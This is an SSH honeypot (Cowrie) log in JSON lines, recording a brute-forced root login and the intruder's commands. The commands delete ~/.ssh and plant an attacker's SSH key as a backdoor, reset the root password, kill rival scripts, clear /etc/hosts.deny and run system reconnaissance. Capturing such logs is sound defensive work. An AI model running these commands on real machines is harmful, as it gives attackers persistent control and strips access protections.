{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:50:21.227000Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.login.success","username":"root","password":"8812345","message":"login attempt [root/8812345] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:50:22.230009Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:22.785605Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:50:22.786315Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:50:22.787088Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:23.037823Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:23.554504Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:50:23.555276Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:50:23.807238Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:23.808142Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46078,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1b114a42f1d","protocol":"ssh","message":"New connection: 212.227.235.229:46078 (1.2.3.4:22) [session: b1b114a42f1d]","sensor":"my-vps","timestamp":"2025-09-08T21:50:24.054846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:50:24.055728Z","src_ip":"212.227.235.229","session":"b1b114a42f1d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:50:24.306937Z","src_ip":"212.227.235.229","session":"b1b114a42f1d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:50:25.963427Z","src_ip":"212.227.235.229","session":"b1b114a42f1d"}
{"eventid":"cowrie.session.connect","src_ip":"185.156.73.235","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"7853917584e0","protocol":"ssh","message":"New connection: 185.156.73.235:64001 (1.2.3.4:22) [session: 7853917584e0]","sensor":"my-vps","timestamp":"2025-09-08T21:50:26.137025Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:26.159837Z","src_ip":"185.156.73.235","session":"7853917584e0"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:27.214547Z","src_ip":"212.227.235.229","session":"b1b114a42f1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46090,"dst_ip":"1.2.3.4","dst_port":22,"session":"77ecc13cf201","protocol":"ssh","message":"New connection: 212.227.235.229:46090 (1.2.3.4:22) [session: 77ecc13cf201]","sensor":"my-vps","timestamp":"2025-09-08T21:50:27.460814Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:50:27.463769Z","src_ip":"212.227.235.229","session":"77ecc13cf201"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:50:27.713145Z","src_ip":"212.227.235.229","session":"77ecc13cf201"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:35.990292Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T21:50:35.991031Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:36.246011Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:36.812846Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"echo \"root:ckFBWKvPpOdx\"|chpasswd|bash","message":"CMD: echo \"root:ckFBWKvPpOdx\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-08T21:50:36.813684Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c4326a9f81d9464c6d15f7a6fab15d96e931093104b653951036c71e5bc2fd36","size":21,"shasum":"c4326a9f81d9464c6d15f7a6fab15d96e931093104b653951036c71e5bc2fd36","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c4326a9f81d9464c6d15f7a6fab15d96e931093104b653951036c71e5bc2fd36 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:37.064199Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:37.622644Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-08T21:50:37.623348Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-08T21:50:37.876678Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:37.877509Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:38.471603Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-08T21:50:38.472371Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.closed","duration":"11.2","message":"Connection lost after 11.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:38.634784Z","src_ip":"212.227.235.229","session":"77ecc13cf201"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:38.725387Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:39.711830Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-08T21:50:39.712605Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:39.964905Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:41.023805Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-08T21:50:41.024463Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-08T21:50:41.024843Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:41.994265Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:42.303472Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-08T21:50:42.303988Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:43.274210Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:43.546166Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-08T21:50:43.546925Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:43.799601Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:44.387704Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-08T21:50:44.388356Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:44.643230Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:45.658157Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T21:50:45.658881Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:45.915158Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:48.318900Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-08T21:50:48.319632Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:48.569860Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:49.632344Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-08T21:50:49.633114Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:49.882959Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:50.397952Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T21:50:50.398748Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:51.586895Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:51.887554Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-08T21:50:51.888321Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:52.858132Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:53.173371Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-08T21:50:53.174202Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:53.423910Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:50:53.941522Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-08T21:50:53.942229Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:54.906026Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
